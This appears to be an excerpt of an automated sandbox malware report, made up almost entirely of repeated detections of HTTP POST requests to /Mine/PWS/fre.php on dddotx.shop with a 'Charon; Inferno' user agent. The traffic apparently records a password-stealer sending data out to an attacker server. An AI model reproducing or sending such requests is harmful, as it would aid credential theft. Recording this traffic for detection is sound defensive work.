Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 192Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /Mine/PWS/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: dddotx.shopAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 925F43C2Content-Length: 165Connection: close
